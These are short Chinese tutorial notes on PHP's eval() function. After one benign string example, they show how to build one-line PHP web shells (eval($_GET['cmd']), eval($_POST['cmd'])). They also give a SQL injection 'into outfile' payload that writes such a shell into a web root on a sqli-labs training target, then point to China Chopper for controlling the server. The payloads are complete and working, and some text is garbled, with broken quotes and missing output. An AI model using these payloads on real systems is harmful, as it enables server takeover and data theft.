eval() 函数把字符串按照 PHP 代码来计算 该字符串必须是合法的 PHP 代码,且必须以分号结尾 如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false
eval() 函数用于简单的文本合并
<?php$string=‘cup‘;$name=‘coffee‘;$str=‘This is a $string with my $name in it.‘;echo $str."\n";eval("\$str=\"$str\";");echo $str."\n";?>
以上例程会输出
用于构造一句话木马
eval($_GET["cmd"]);
通过数据库写马
环境:sql_labs Less-7
写入一句话木马
union select 1,2,‘<?php eval($_POST["cmd"]);?>‘ into outfile ‘d:/wampserver/wamp64/www/sqli/sqli/Less-7/twx.txt‘%23
使用中国菜刀进行连接
可以访问并操作服务器文件
通过PHP 文件写马
<?phpeval($_GET["cmd"]);?>
访问PHP 文件,查看phpinfo()